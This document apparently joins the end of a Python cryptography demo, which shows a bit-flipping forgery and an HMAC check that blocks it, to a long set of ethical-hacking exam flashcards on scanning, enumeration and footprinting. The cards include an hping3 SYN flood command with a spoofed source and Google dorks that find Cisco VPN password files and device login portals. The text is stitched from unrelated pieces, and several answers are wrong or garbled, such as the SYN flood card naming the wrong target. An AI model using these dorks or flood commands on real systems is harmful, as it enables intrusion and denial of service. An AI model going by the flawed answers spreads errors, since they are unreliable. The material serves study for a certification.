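def seal(key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes):
    """Encrypt-then-MAC: the tag covers nonce and ciphertext."""
    ct = xor_crypt(key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct, tag


def open_sealed(key: bytes, mac_key: bytes, nonce: bytes, ct: bytes, tag: bytes) -> bytes:
    """Verify the tag in constant time before touching the ciphertext."""
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("MAC check failed: ciphertext was modified")
    return xor_crypt(key, nonce, ct)


# Constructed demo values; real keys come from a KDF or a CSPRNG.
KEY, MAC_KEY, NONCE = b"k" * 32, b"m" * 32, b"\x00" * 8
MESSAGE = b"user=guest;role=user"

if __name__ == "__main__":
    ct = xor_crypt(KEY, NONCE, MESSAGE)
    forged = flip_field(ct, b"guest", b"admin", MESSAGE.index(b"guest"))
    print(xor_crypt(KEY, NONCE, forged))
    ct2, tag = seal(KEY, MAC_KEY, NONCE, MESSAGE)
    try:
        open_sealed(KEY, MAC_KEY, NONCE, flip_field(ct2, b"guest", b"admin", 5), tag)
    except ValueError as exc:
        print(exc)
```

An authenticated mode such as AES-GCM or ChaCha20-Poly1305 builds the same check in; the separate HMAC is shown here only to make the defence visible.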

Two (Trigger and Payload)

A logic bomb has how many parts, typically?

Insert themselves into an active session

A man-in-the-middle attack is an attack where the attacking party does which of the following?

A. nmap -A IPAddress

A member of your team enters the following command: nmap -sV -sC -O -traceroute IPAddress Which of the following nmap commands performs the same task? A. nmap -A IPAddress B. nmap -all IPAddress C. nmap -Os IPAddress D. nmap -sA IPAddress

Unicast

A packet addressed for, and intended to be received by, only one host interface

Anycast

A packet addressed in such a way that any of a large group of hosts can receive it, with the nearest host (in terms of routing distance) opening it

Multicast

A packet that is addressed in such a way that multiple host interfaces can receive it

D. Passive

A pen test member has gained access to an open switch port. He configures his NIC for promiscuous mode and sets up a sniffer, plugging his laptop directly into the switch port. He watches traffic as it arrives at the system, looking for specific information to possibly use later. What type of sniffing is being practiced? A. Active B. Promiscuous C. Blind D. Passive E. Session

A. To possibly gather information about internal hosts used in the organization's e-mail system

A pen test team member sends an e-mail to an address that she knows is not valid inside an organization. Which of the following is the best explanation for why she took this action? A. To possibly gather information about internal hosts used in the organization's e-mail system B. To start a denial-of-service attack C. To determine an e-mail administrator's contact information D. To gather information about how e-mail systems deal with invalidly addressed messages

ICMP Type 8

A ping message, requesting an Echo reply.

Baseline

A point of reference used to mark an initial state in order to manage change.

Evades detection through rewriting itself

A polymorphic virus ____

copyright

A set of exclusive rights granted by the law of a jurisdiction to the author or creator of an original work, including the right to copy, distribute, and adapt the work.

business continuity plan (BCP)

A set of plans and procedures to follow in the event of a failure or a disaster--security related or not--to get business services back up and running.

certificate authority (CA)

A trusted entity that issues and revokes public key certificates. In a network, is a trusted entity that issues, manages, and revokes security credentials and public keys for message encryption and/or authentication. Within a public key infrastructure (PKI), works with registration authorities (RAs) to verify information provided by the requestor of a digital certificate.

This flag is set as an acknowledgment to SYN flag. This flag is set on all segments after the initial SYN flag.

ACK (Acknowledgment)

countermeasures

Actions, devices, procedures, techniques, or other measures intended to reduce the vulnerability of an information system.

assessment

Activities to determine the extent to which a security control is implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Push and pop

Adding to and removing from a program stack are known as what?

Africa

AfriNIC manages what areas?

D) A nmap scan with the -sO switch

After a network scan, very few conventional ports are discovered to be open. You decide you want to discover as many protocols on the sweep as possible. Which of the following is the best choice for your port scan? A) A nessus sweep of the subnet B) A nmap scan with the -sP switch C) A nmap scan with the -se switch D) A nmap scan with the -sO switch

Common Internet File System/Server Message Block

An Application layer protocol used primarily by Microsoft Windows to provide shared access to printers, files, and serial ports. It also provides an authenticated interprocess communication mechanism.

Local configuration of an internal router by an internal administrative workstation

An administrator is configuring a network intrusion detection system (IDS). Audit rules need to be configured so that only malicious activities and policy violations are detected and logged. Which of these scenarios should you NOT add as an audit rule? A)Local configuration of an internal router by an internal administrative workstation B)Remote access of an external router from a known IP address in a blacklist database C)Remote configuration of an internal router by an unknown external laptop D)Local access of an internal router from an unknown IP address not in an employee database

An obvious method to use a system

An overt channel is ___?

Single loss Expectancy (SLE) x Annual Rate of Occurrence (ARO)

Annualized Loss Expectancy (ALE) = what?

are services on the Internet that make use of a web proxy to hide your identity.

Anonymizers

ICMP Type 0

Answer to a Type 8 Echo Request.

alter the launch daemon's

Attacker can ___ executable to maintain persistence or to escalate privileges

web-stat Alexa Monitis

Attacker uses website traffic monitoring tools such as ______, etc. to collect the information about target company.

installs reverse HTTP shell

Attackers ___ on victim's machine, which is programmed in such a way that it would ask for commands to an external master who controls the reverse HTTP shell

exploit software vulnerabilities

Attackers ____ by taking advantage of programming flaws in a program, service, or within the operating system software or kernel to execute malicious code

execute malicious code

Attackers alter plist files to ___ on behalf of a legitimate user to escalate privileges

Audit data

Chronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.

filetype:pcf "cisco" "GroupPwd"

Cisco VPN files with Group Passwords for remote access

CSMA/CD (collision detection) CSMA/CA (collision avoidance)

Collisions within a collision domain can be managed by ___ or ___.

clear text

Community strings are transmitted in ____ in SNMPv1

CAM table

Content addressable memory table. Holds all the MAC-address-to-port mappings on a switch.

"Config" intitle:"Index of" intext:vpn

Directory with keys of VPN servers

info:string example: info:www.anycomp.com

Displays information Google stores about the page itself

link:string

Displays linked pages based on a search term.

[cache:]

Displays the web pages stored in the Google cache

1. Check for live systems 2. Check for open ports 3. Scan beyond IDS 4. Perform banner grabbing 5. Scan for vulnerabilities 6. Draw network diagrams 7. Prepare proxies

EC-Council's scanning methodology phases include the following steps:

C. Hashing

Elements of security include confidentiality, integrity, and availability. Which technique provides for integrity? A. Encryption B. UPS C. Hashing D. Passwords

eMailTrackerPro; PoliteMail; Yesware; ContactMonkey; Zendio; ReadNotify; DidTheyReadIt; Trace Email

Email Tracking Tools

track an email and extract information

Email tracking tools allow an attacker to ____ such as sender identity, mail server, sender's IP address, location, etc.

A. FISMA

Enacted in 2002, this U.S. law requires every Federal agency to implement information security programs, including significant reporting on compliance and accreditation. Which of the following is the best choice for this definition? A. FISMA B. HIPAA C. NIST 800-53 D. OSSTM

Engineer's Toolset; SNMPScanner; OpUtils 5; SNScan

Enumerate with SNMP tools:

identify any vulnerable services

Enumerating RPC endpoints enable attackers to ___ on these service ports

PsTools

Enumerating user accounts using ___ suite helps to control and manage remote systems from the command line

ICMP Type 3 Code 13

Error message - Communication administratively prohibited

ICMP Type 3 Code 1

Error message - Destination host unreachable

ICMP Type 3 Code 0

Error message - Destination network unreachable

Vulnerability

Existence of a weakness, design, or implementation error that can lead to an unexpected event compromising the security of the system

Root: "."; Top level ("parent domain"): .gov, .com, .net, .org; Second level ("child domain"): microsoft.com, google.com; Third level (hosts and resources): www.anyname.com

Explain DNS structure.

Domain Dossier; DNS Lookup

Extracting DNS Information

Folder Steganography

Files are hidden and encrypted within a folder and do not appear to normal Windows applications, including Windows Explorer

Netcraft

Which service finds restricted URLs and a site's operating system (OS)? It also has a toolbar add-on for Firefox and Chrome.

ARIN whois database search

Find the range of IP addresses using ______

"[main]" "enc_GroupPwd=" ext:txt

Finds Cisco VPN client passwords (encrypted, but easily cracked)

inurl:/remote/login?lang=en

Finds FortiGate firewall SSL-VPN login portals

GiliSoft File Lock Pro; Folder Lock; Hide Folders 5; WinMend Folder Hidden; Invisible Secrets 4; Max Folder

Folder Steganography Tools

Google; Yahoo! Search; Ask; Bing; Dogpile

Footprint search engines such as ___ , etc. to gather target organization's information such as employee details, login pages, intranet portals, etc. that helps in performing social engineering and other types of advanced system attacks

reduces the attacker's focus area

Footprinting ___ to a specific range of IP addresses, networks, domain names, remote access, etc.

draw a map or outline

Footprinting allows attackers to ____ the target organization's network infrastructure to know about the actual environment that they are going to break

Hoovers; LexisNexis; Business Wire

Gather competitive intelligence using tools such as ___ , etc.

public network information; system information; personal information

Groups, forums, and blogs provide sensitive information about a target such as ______

Algorithms

Hide data in mathematical functions used in compression algorithms

C) He cannot spoof his IP and successfully use TCP

An attacker spoofs his source IP address and tries to telnet to a target, but the connection never completes. Which of the following best explains the failure? A) The firewall is blocking telnet traffic B) Port 23 is not the correct port for telnet C) He cannot spoof his IP and successfully use TCP D) The target is most likely a honeypot

Malware attacks; Footprinting; Password attacks; Denial-of-Service attacks; Arbitrary code execution; Unauthorized access; Privilege escalation; Backdoor attacks; Physical security threats

Host Threats

By ping scanning very slowly

How can a hacker take advantage of alert threshold settings to avoid detection?

more ~/.bash_history

How can you view the BASH saved command history?

Scan entire subnet for live host

Hping Commands: hping3 -1 10.0.1.x --rand-dest -I eth0

UDP scan on port 80

Hping Commands: hping3 -2 10.0.0.25 -p 80

IDLE Scan: Step 3

IPID Probe SYN+ACK Packet --> (zombie) <-- Response: IPID=31339 RST Packet IPID incremented by 2 since step 1, so port 80 must be open

IDLE Scan: Step 1

IPID Probe SYN+ACK Packet --> (zombie) <-- Response: IPID=31337 RST Packet

TTL Expired

If a packet capture device shows the packet as Type 11, Code 0, what does it mean?

Administratively Blocked

If a packet capture device shows the packet as Type 3, Code 13, what does it mean?

nbtstat -A IPADDRESS

If you want to bring up a remote system table using NetBIOS.

eavesdropping, shoulder surfing, dumpster diving

Implement social engineering techniques such as ____ that may help to gather more critical information about the target organization

setuid, setgid

In Linux and MacOS, if an application uses ___ or ___ then the application will execute with the privileges of the owning user or group

FIN, URG, PSH

In Xmas scan, attackers send a TCP frame to a remote device with ___ flags set

asymmetric algorithm

In computer security, an algorithm that uses separate keys for encryption and decryption.

active, passive

In enumeration, ___ OS fingerprinting involves sending crafted, nonstandard packets to a remote host and analyzing the replies. ____ OS fingerprinting involves sniffing packets without injecting any packets into the network--examining things like Time-to-Live (TTL), window sizes, Don't Fragment (DF) flags, and Type of Service (ToS) fields from the capture.

access control lists

In networking, ____ are commonly associated with firewall and router traffic-filtering rules.

collision

In regard to hash algorithms, occurs when two or more distinct inputs produce the same output.

attacker

In source routing, the ___ makes some or all of these decisions on the router

Port number

In the command telnet 192.168.5.5 23, what does the number 23 stand for?

Where messages are routed through multiple intermediaries

In what scenarios should end-to-end security mechanisms like XMLEncryption, XMLSignature, and SAML assertions be used?

Spear phishing

In what type of attack does the attacker send high-level personnel an email that appears to come from an individual who might reasonably request confidential information, but the email includes a bogus link?

Social engineering

In what type of attack does the attacker use believable language to attempt to gain confidential information, especially login credentials, from personnel?

Penetration testing

In which CEH hacking stage do you try to break the security of the system?

Scanning/Enumeration

In which phase of an attack does discovery of live hosts, access points, accounts and policies, and vulnerability assessment occur?

Reconnaissance

In which phase of an attack does information gathering, physical and social engineering, and locating network ranges occur?

Clearing Tracks

In which phase of an attack is the record of the attack wiped or obscured?

D. Maintaining access

In which phase of the attack would a hacker set up and configure "zombie" machines? A. Reconnaissance B. Covering tracks C. Gaining access D. Maintaining access

SDA

Indicate authority for domain

Cyber Terrorists

Individuals with wide range of skills, motivated by religious or political beliefs to create fear by large-scale disruption of computer networks

Gather personal information that assists to perform social engineering

Information obtained from WHOIS database assists an attacker to:

active fingerprinting

Injecting traffic into the network to identify the operating system of a device

Footprinting

Is the process of collecting as much information as possible about a target network, for identifying various ways to intrude into an organization's network system

Hack Value

It is the notion among hackers that something is worth doing or is interesting

NetScanToolsPro

It lists IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automatically or manually (using manual tools)

Open Source Security Testing Methodology Manual (OSSTMM)

It's a peer-reviewed formalized methodology of security testing and analysis that can "provide actionable information to measurably improve your operational security."

www.archive.org, Google Cache

Keeps snapshots of sites from days gone by:

Amac Keylogger, Elite Keylogger, Auto Mac OS X KeyLogger, KidLogger for MAC, Perfect Keylogger for Mac, MAC Log Manager

Keyloggers for Mac

All In One Keylogger, Spyrix Personal Monitor, SoftActivity Activity Monitor, Elite Keylogger, Keylogger Spy Monitor, Micro Keylogger

Keyloggers for Windows

Latin America and the Caribbean.

LACNIC manages what areas?

Query a database

LDAP is used to perform which function?

port 389

LDAP sessions are started by a client on TCP ____ connecting to a Directory System Agent (DSA).

Physical

Layer 1 of OSI model

Data Link

Layer 2 of OSI model

Data Link layer

Layer 2 of the OSI reference model. This layer provides reliable transit of data across a physical link. Is concerned with physical addressing, network topology, access to the network medium, error detection, sequential delivery of frames, and flow control. Is composed of two sublayers: the MAC and the LLC.

Network

Layer 3 of OSI model

Transport

Layer 4 of OSI model

Security (Restrictions), Functionality (Features), Usability (GUI)

Level of security in any system can be defined by the strength of three components of this triangle.

[related:]

Lists web pages that are similar to a specified web page

[link:]

Lists web pages that have links to the specified web page

asymmetric

Literally, "not balanced or the same." In computing, ___ refers to a difference in networking speeds upstream to downstream. In cryptography, it's the use of more than one key for encryption/authentication purposes.

D)Smart cards

Management at your organization has asked you to implement an access control mechanism that uses Extensible Authentication Protocol (EAP). Which mechanism should you implement? A)Biometrics B)Access control lists (ACLs) C)Complex passwords D)Smart cards

A)Active

Management has increasingly become concerned about sniffing attacks. Which type of sniffing involves launching an ARP spoofing or traffic-flooding attack? A)Active B)Passive C)Promiscuous D)Broadcast

Metagoofil, ExtractMetadata, FOCA, Meta Tag Analyzer, BuzzStream Analyze Metadata, Exiftool

MetaData Extraction Tools

TCP/UDP 135

Microsoft RPC Endpoint Mapper

Internet Security Association and Key Management Protocol (ISAKMP)

Most IPsec-based VPNs use ____, a part of IKE, to establish, negotiate, modify, and delete Security Associations (SA) and cryptographic keys in a VPN environment

80, 25

Most network servers listen on TCP ports, such as web servers on port ___ and mail servers on port ___. A port is considered "open" if an application is listening on it

Web Mirroring Tools

NCollector Studio, Teleport Pro, Portable Offline Browser, Website Ripper Copier, Gnu Wget, HTTrack Web Site Copier

Alternate Data Streams

NTFS has a feature called ___ that allows attackers to hide a file behind other normal files

TCP 139

NetBIOS Session Service (SMB over NetBIOS)

<1C> UNIQUE

NetBIOS code and type for Domain controller.

<1B> UNIQUE

NetBIOS code and type for Domain master browser.

<00> GROUP

NetBIOS code and type for Domain name

<00> UNIQUE

NetBIOS code and type for Hostname

Net Master, Scany, Network "Swiss-Army-Knife"

Network Discovery Tools for Mobile

Network Topology Mapper, OpManager, NetworkView, The Dude, Switch Center Enterprise, LANState, InterMapper, Friendly Pinger, NetMapper, Ipsonar, NetBrain Enterprise Suite, WhatsConnected, Spiceworks-Network Mapper

Network Discovery and Mapping Tools

Nmap

Network administrators can use __ for network inventory, managing service upgrade schedules, and monitoring host or service uptime

number of packets sent

OS increments the IPID for each packet sent, thus probing an IPID gives an attacker the ___ since last probe.

legislative (government regulations), contractual (industry or group requirements), standards based (practices that must be followed in order to remain a member of a group or organization)

OSSTMM defines three types of compliance for testing: ___, ___, ___.

Know Security Posture, Reduce Focus Area, Identify Vulnerabilities, Draw Network Map

Objectives of Footprinting

A)SNScan

One of your company's IT technicians provides you with a report that lists SNMP-enabled devices on a network. Which tool most likely provided this information? A)SNScan B)Foundstone C)Ecora D)NetBus

Anonymizers for Mobile

Orbot, Psiphon, OpenDoor

DNSstuff, DNS Records

Perform DNS footprinting using tools such as ___, etc. to determine key hosts in the network and perform social engineering attacks

GHDB, Metagoofil, SiteDigger

Perform Google hacking using tools such as ___, etc.

first layer of protection

Physical security is the ______ in any organization

console port

Physical socket provided on routers and switches for cable connections between a computer and the router/switch. This connection enables the computer to configure, query, and troubleshoot the router/switch by use of a terminal emulator and a command-line interface.

Combining pings to every address within a range

Ping sweep or ICMP Echo scanning

RPC (TCP)

Port number 135

NetBIOS (TCP, UDP)

Port number 137 - 139

IMAP (TCP)

Port number 143

SNMP (UDP)

Port number 161/162

BGP

Port number 179

FTP (TCP)

Port number 20, 21

[info:]

Presents some information that Google has about a particular web page

Stateful Firewall is Present (ACK Flag Probe)

Probe Packet (ACK) --> <-- No Response

No Firewall (ACK Flag Probe)

Probe Packet (ACK) --> <-- RST

Port is closed (Inverse TCP Flag Scanning)

Probe Packet (FIN/URG/PSH/NULL) --> <-- RST/ACK

User

RID 1000 and up

Administrator

RID 500

Guest

RID 501

Europe, Middle East, and parts of Central Asia/Northern Africa.

RIPE manages what areas?

This flag forces a termination of communications (in both directions)

RST (Reset)

Prevent hackers, Uncover vulnerabilities, Strengthen an organization's security posture

Reasons why organizations recruit ethical hackers

C)Databases

Recently you discovered that several of your company's computers have experienced SQL injection attacks. Which specific entity is attacked? A)Routers B)Firewall C)Databases D)Web servers

ICMP Type 5 Code 1

Redirect datagram for the host

ICMP Type 5 Code 0

Redirect datagram for the network

Website footprinting

Refers to monitoring and analyzing the target organization's website for information

Clearing Tracks or Covering Tracks

Refers to the activities carried out by an attacker to hide malicious acts

Authenticity

Refers to the characteristics of a communication, document or any data that ensures the quality of being genuine

Maintaining Access

Refers to the phase when the attacker tries to retain his or her ownership of the system

Gaining Access

Refers to the point where the attacker obtains access to the operating system or application on the computer or network

Scanning

Refers to the pre-attack phase when the attacker scans the network for specific information on the basis of information gathered during reconnaissance

Reconnaissance

Refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching an attack

ARIN, AFRINIC, RIPE, LAC, APNIC

Regional Internet Registries (RIRs)

remotely installs applications, executes programs/scripts

RemoteExec ___, and updates files and folders on Windows system throughout the network

RP

Responsible person

[intitle:]

Restricts the results to documents containing the search keyword in the title

[site:]

Restricts the results to those websites in the given domain

[allinurl:]

Restricts the results to those with all of the search keywords in the URL

UDP/TCP ports 2000, 2001, 5050, 5061

SIP service generally uses what ports?

TCP/UDP 445

SMB over TCP (Direct Host)

RCPT TO

SMTP (Simple Mail Transfer Protocol) command to define recipients.

EXPN

SMTP (Simple Mail Transfer Protocol) command to provide the actual delivery addresses of mailing lists and aliases.

VRFY

SMTP (Simple Mail Transfer Protocol) command to validate users.

Send email messages

SMTP is used to perform which function?

Three-way handshake

SYN, SYN/ACK, ACK

IDLE Scan: Step 2 (Port Closed)

SYN Packet to port 80 spoofing zombie IP address --> (target) (zombie) <-- RST

intitle:string (examples: intitle:login; allintitle:login password)

Searches for pages that contain the string in the title.

filetype: (example: filetype:doc)

Searches only for files of a specific type (DOC, XLS, and so on).

IPsec

Session hijacking can be performed on all of the following protocols except which one? FTP SMTP HTTP IPsec

Authentication

Session hijacking can be thwarted with which of the following? SSH FTP Authentication Sniffing

RedirectEXE, injectDLL, GetProcAddress

Shims like ___ can be used by attackers to escalate privileges, install backdoors, disable Windows defender, etc.

related:webpagename

Shows web pages similar to webpagename.

TCP 25

Simple Mail Transfer Protocol (SMTP)

UDP 161

Simple Network Management Protocol (SNMP)

gives attackers full access to your system

The Sirefef Rootkit or ZeroAccess ___ while using stealth techniques in order to hide its presence from the affected device

altering the internal processes

Sirefef hides itself by ___ on an operating system so that your antivirus and anti-spyware can't detect it

Phishing

Social engineering can be used to carry out email campaigns known as _____?

Human nature, Technology, People, Physical

Social engineering preys on many weaknesses including _____

SEC Info (www.secinfo.com), Experian (www.experian.com), Market Watch (www.marketwatch.com), Wall Street Monitor (www.twst.com), Euromonitor (www.euromonitor.com)

Some websites for competitive intelligence. Company plans and financials.

EDGAR Database (www.sec.gov/edgar.shtml), Hoovers (www.hoovers.com), LexisNexis (www.lexisnexis.com), Business Wire (www.businesswire.com)

Some websites for competitive intelligence. Information on company origins and how it developed over the years can be found in places like:

Authenticity

Sometimes included as a security element, refers to the characteristic of data that ensures it is genuine.

establishes a full connection

TCP Connect scan ___ and tears it down by sending a RST packet

super user privileges

TCP Connect scan does not require ___

SYN (Synchronize)

TCP Flag, Initiates a connection between hosts

Layer 4 Transport

TCP, UDP resides at what layer of the OSI model?

Anonymizers

Tails, G-Zapper, Proxify, Guardster, Psiphon, Spotflux, Anonymous Web Surfing Tool, Ultrasurf, Hide Your IP Address, Head Proxy, Anonymizer Universal, Hope Proxy

live operating system

Tails is a _____ that a user can start on any computer from a DVD, USB stick, or SD card.

public

The ___ community string is used for read-only searches.

NTLMv2 hash

The attacker cracks the ____ obtained from the victim's authentication process

Tcpdump

The command-line equivalent of Win Dump is known as what?

Authorization

The conveying of official access or legal power to a person or entity.

Security target (ST)

The documentation describing the TOE (Target of evaluation) and security requirements

organizational unique identifier (OUI)

The first half of the MAC address, consisting of 3 bytes (24 bits), is known as the ____ and is used to identify the card manufacturer.

Gray hats

The hardest group to categorize, these hackers are neither good nor bad.

Internet and other publicly accessible sources

The pen tester attempts to gather as much information as possible about the target organization from the _____

Authentication

The process of determining whether a network entity (user or service) is legitimate--usually accomplished through a user ID and password.

cryptography

The science or study of protecting information, whether in transit or at rest, by using techniques to render the information unusable to anyone who does not possess the means to decrypt it.

Asynchronous transmission

The transmission of digital signals without precise clocking or synchronization

Password Policy

This defines everything imaginable about passwords within the organization, including length, complexity, maximum and minimum age, and reuse.

Information Protection Policy

This defines information sensitivity levels and who has access to those levels. It also addresses how data is stored, transmitted, and destroyed.

Access Control Policy

This identifies the resources that need protection and the rules in place to control access to those resources

ICMP Echo Scanning

This is not really port scanning, since ICMP does not have a port abstraction. But it is sometimes useful to determine which hosts in a network are up by pinging them all

PTR (Pointer)

This maps an IP address to a hostname (providing for reverse DNS lookups).

Special-Access Policy

This policy defines the terms and conditions of granting special access to system resources

SRV (Service)

This record defines the hostname and port number of servers providing specific services, such as a Directory Services server.

IDLE

This uses a spoofed IP address (zombie system) to elicit port responses during a scan.

risk assessment approach

Threat modeling is a ____ for analyzing security of an application by capturing, organizing, and analyzing all the information that affects the security of an application

A)CRLF injection

Through a company website, customers use a standard HTML form to submit service requests to the web server. The web server in turn creates an SMTP email and sends it on to a customer support email address. The HTML form receives the following subject line: Email is not working<CR><LF>Bcc: [email protected] Which type of attack is being attempted? A)CRLF injection B)Session splicing C)XSS D)Email spoofing

A)Throttling

To prevent DoS attacks, you set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for the server to process. What is this process referred to as? A)Throttling B)Filtering C)QoS D)Clustering

Phishing, Tailgating/Piggybacking

Training and education of end users can be used to prevent _____

When this flag is set, it indicates the data inside is being sent out of band. Cancelling a message mid-stream is one example.

URG (Urgent)

Layer 1 Physical

USB Standards, Bluetooth, Etc. resides at what layer of the OSI model?

bluesnarfing

Unauthorized access to information such as a calendar, contact list, e-mails, and text messages on a wireless device through a Bluetooth connection.

determine the OS

Use the Netcraft tool to _____ in use by the target organization.

Netcraft tool

Use the ___ to determine the Operating Systems in use by the target organization

HTTP GET commands

Victim here will act as a web client who is executing ___ whereas the attacker behaves like a web server and responds to the requests (Covering Tracks on Network Using Reverse HTTP Shells)

Denial-of-Service (DoS), Session Hijacking, Caller ID spoofing, Eavesdropping, Spamming over Internet Telephony (SPIT), VoIP phishing (Vishing)

VoIP enumeration information can be used to launch various VoIP attacks such as ____

SIP (Session Initiation Protocol)

VoIP uses ___ protocol to enable voice and video calls over an IP network

National Vulnerability Database (nvd.nist.gov), Securitytracker (www.securitytracker.com), Hackerstorm Vulnerability Database Tool (www.hackerstorm.com), Security-Focus (www.securityfocus.com)

Vulnerability research should include looking for the latest exploit news, any zero-day outbreaks in viruses and malware, and what recommendations are being made to deal with them. What are some tools to help with this?

DNS Tools, UltraTools Mobile, Whois Lookup Tool

WHOIS Lookup Tools for Mobile

A backdoor

What is a covert channel?

Ability to filter for packet fragments

What is the main improvement of ipchains over ipfwadm?

Insider affiliate

What threat type is someone with limited authorized access?

operating system level, application level, network level

What three levels can attackers gain access to?

Tails

What tool aims at preserving privacy and anonymity and helps you to: use the Internet anonymously and circumvent censorship; leave no trace on the computer; use state-of-the-art cryptographic tools to encrypt files, emails and instant messaging?

CurrPorts

What tool displays a list of all currently opened TCP/IP and UDP ports on your local computer, including information about the process that opened the port: the process name, full path, version information, the time it was created, and the user who created it?

StegoStick

What tool hides any file or message in an image (BMP, JPG, GIF), Audio/Video (MPG, WAV, etc.) or any other file format (PDF, EXE, CHM, etc.)?

McAfee's Visual Trace, NeoTrace, Trout, VisualRoute, Magic NetTrace, Network Pinger, GEO Spider, Ping Plotter

What tools can you use to build a comprehensive map of a network showing geographic locations and such?

A host-based IDS

What type of IDS can recognize an attack made with the use of fragroute?

Nbtstat

Which command can be used to view NetBIOS information?

netsh firewall set opmode enable

Which command enables the Windows firewall?

A)Security awareness training

Which of the following is NOT a component of risk assessment? A)Security awareness training B)Physical safeguards C)Administrative safeguards D)Logical safeguards

C)Host-based IDS on the exposed system

Which of the following is a possible mitigation to the use of fragroute by an attacker? A)SPAN B)RSPAN C)Host-based IDS on the exposed system D)Expression matching

END

Which of the following is not a flag on a packet?

D. Teardrop

Which of the following takes advantage of weaknesses in fragment reassembly in TCP/IP? A. Stuxnet B. Smurf C. SYN Flood D. Teardrop

NULL

Which of the following types of attack has no flags set?

22

Which port number is used for SSH?

Malware covers all malicious software

Which statement(s) define malware most accurately?

D) Scanning

Which step comes right after footprinting? A) Privilege escalation B) Gaining access C) System attacks D) Scanning

No response; RST/ACK

XMAS scans, if the port is open _____, if the port is closed ____ responses.

Microsoft Windows

Xmas scan will not work against any current version of ___

D) Ping Sweep

You are attempting to identify live targets on a particular subnet. You kick off a scan whereby ICMP packets are sent to every IP address within the subnet and await responses. What is this activity called? A) Enumeration B) Ping Crawl C) Port Scan D) Ping Sweep

telephone calls to the help desk or technical department

example of Active Reconnaissance

searching public records or news releases

example of Passive Reconnaissance

performs an ICMP ping

hping3 -1 172.17.15.12

performs a UDP scan on port 80

hping3 -2 192.168.12.55 -p 80

scans ports 20 through 100

hping3 -8 20-100

looks for HTTP signature packets on eth0

hping3 -9 HTTP -I eth0

SYN flood from 192.168.10.10 against 192.168.10.22

hping3 -S 192.168.10.10 -a 192.168.10.22 -p 22 --flood

Pages containing D-Link login portals

intitle:"D-Link VoIP Router" "Welcome"

Pages containing login portals

intitle:"Login Page" intext:"Phone Adapter Configuration Utility"

Search Linksys phones

intitle:"SPA Configuration"

Finds the Asterisk web management portal

intitle:asterisk.management.portal web-access

Look for the Asterisk management portal

intitle:asterisk.management.portal web-access

Find the Cisco phone details

inurl:"NetworkConfiguration" cisco

Find Cisco call manager

inurl:"ccmuser/login.asp"

Competitive intelligence

is non-interfering and subtle in nature

PsKill

kill processes by name or process ID

Internet Assigned Numbers Authority (IANA)

maintains something called the Service Name and Transport Protocol Port Number Registry, which is the official list for all port number reservations.

SYN port scan on a target as quietly as possible

nmap 192.168.1.0/24 -sS -T0

An aggressive XMAS scan

nmap 192.168.1.0/24 -sX -T4

Scan multiple IPs

nmap 192.168.1.100 192.168.1.101

nmap <scan options> <target>

nmap syntax

Dynamic ports

port numbers 49,152 - 65,535

is nothing more than a system you set up to act as an intermediary between you and your targets.

proxy

PsShutdown

shuts down and optionally reboots a computer

active footprinting

social engineering, human interaction, and anything that requires the hacker to interact with the organization is considered what type of footprinting?

IP address decoy

technique refers to generating or manually specifying IP addresses of the decoys in order to evade IDS/firewall

E-mail Policy or E-mail Security Policy

this addresses the proper use of the company e-mail system.

Full Connect (also called TCP connect or full open scan)

this runs through a full connection (three-way handshake) on all ports, tearing it down with an RST at the end.

ICMP ECHO packets (UDP datagrams in Linux versions)

traceroute or tracert uses what to report information on each "hop" (router) from the source to the destination?

Cracker, malicious hacker

uses those skills, tools, and techniques either for personal gain or destructive purposes or, in purely technical terms, to achieve a goal outside the interest of the system owner.

confidentiality, integrity, availability

what is the trinity of IT security? (3 parts)

CCleaner

what tool cleans traces of temporary files, log files, registry files, memory dumps, and also your online activities such as your Internet history

Anonymous footprinting

where you try to obscure the source of all this information gathering

Normal output

-oN

B) Xterm

Of the commands listed, which are most likely to NOT be Trojaned by an attacker? A) Netstat B) Xterm C) Ps D) Top

B) MBSA

Of the following, which is best for checking patch levels on a Windows machine? A) Nslookup B) MBSA C) Metasploit D) Sigverif

C)Hot and cold aisles

Of the listed physical security controls, which is usually only deployed in the data center? A)Fire suppression B)CCTV cameras C)Hot and cold aisles D)Security guards

NetScan Tools Pro, SuperScan, Network Inventory Explorer, PRTG Network Monitor, Global Network Inventory, Net Tools, SoftPerfect Network Scanner, IP-Tools, Advanced Port Scanner, MegaPing, CurrPorts

Scanning Tools

NetScanTools Pro, SuperScan, PRTG Network Monitor, OmniPeek, MiTeC Network Scanner, NEWT Professional, MegaPing

Scanning Tools

Umit Network Scanner, Fing, IP Network Scanner, PortDroid Network Analysis, Pamn IP Scanner, Network Discovery

Scanning Tools for Mobile

Bit

What PDU is at Layer 1 of OSI model

Training

What is the best option for thwarting social engineering attacks?

True positive

What is the term for a system correctly allowing traffic or actions that should be allowed?

True negative

What is the term for a system correctly preventing traffic or actions that should not be allowed?

False negative

What is the term for a system failing to prevent traffic or actions that should not be allowed?

Denial of service

What type of cybersecurity attack is mitigated by redundancy?

Cookie hijacking

Which attack can be used to take over a previous session?

B)CA

Which component in the PKI issues the certificate? A)CPS B)CA C)RA D)VA

C)OSSTMM

Which of the following testing methodologies addresses security controls? A)SOAP B)CORBA C)OSSTMM D)OWASP

B)Distributed denial of service, E)Password cracking

You are running a penetration test for a small IT service provider during normal operating hours. Which of the following activities is most likely to be restricted in the rules of engagement (ROE)? (Choose all that apply.) A)Social engineering B)Distributed denial of service C)Network sniffing D)Port scanning E)Password cracking

C. CNAME

You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)? A. NS B. SOA C. CNAME D. PTR

A)It is very easy to detect on the computer or device being scanned.

You have decided to use Nmap to scan your network to aid in determining any network security issues that exist. The first type of scan that you decide to run is the TCP connect scan. Which statement is true regarding this type of scan? A)It is very easy to detect on the computer or device being scanned. B)It sends a packet with only the FIN flag set in the TCP header. C)It sends a packet with no flags switched on in the TCP header. D)It can detect three port states: open, closed, and filtered.

A)Deploy a switch, and implement a VLAN for the Research department devices and computers.

